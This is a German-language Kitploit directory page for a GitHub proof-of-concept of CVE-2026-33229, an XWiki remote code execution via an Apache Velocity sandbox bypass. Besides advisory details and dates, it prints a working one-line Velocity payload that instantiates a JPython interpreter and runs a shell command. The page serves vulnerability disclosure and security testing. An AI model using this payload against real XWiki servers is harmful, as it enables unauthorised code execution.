Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33229 — Proof-of-Concept-Exploit für CVE-2026-33229, eine XWiki-RCE über die Umgehung der Apache-Velocity-Sandbox, mit technischen Details und einem funktionierenden Payload. | Kitploit
Tools/GitHubGitHub/azefzafyoussef/cve-2026-33229
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPayload-Entwicklung
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

Proof-of-Concept-Exploit für CVE-2026-33229, eine XWiki-RCE über die Umgehung der Apache-Velocity-Sandbox, mit technischen Details und einem funktionierenden Payload.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33229 — XWiki RCE über Apache Velocity Sandbox-Bypass

CVE Severity Status

Eine Remote-Code-Execution-Schwachstelle in der XWiki Platform, die es einem authentifizierten Benutzer mit Skriptberechtigungen ermöglicht, die Apache-Velocity-Sandbox vollständig zu umgehen — ohne Java-Reflection — indem vorinstanziierte Objekte durchlaufen werden, die bereits im Velocity-Kontext vorhanden sind.

📄 Vollständige technische Details: youssefazefzaf.com/posts/cve


Details

FeldWert
CVE-IDCVE-2026-33229
Betroffenes ProduktXWiki Platform
KomponenteVelocity-Makro-Renderer, Seiten-Titel-Parameter
Erforderliche BerechtigungenAuthentifiziert + Skriptberechtigung
AuswirkungRemote Code Execution
GHSAGHSA-h259-74h5-4rh9
Entdeckt7. November 2025
Gepatcht10. Dezember 2025
Offengelegt8. April 2026

Proof of Concept

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

Hinweis zur verantwortungsvollen Offenlegung: PoC nach Verfügbarkeit des Patches veröffentlicht. Nicht gegen Systeme verwenden, die dir nicht gehören.

Tool herunterladen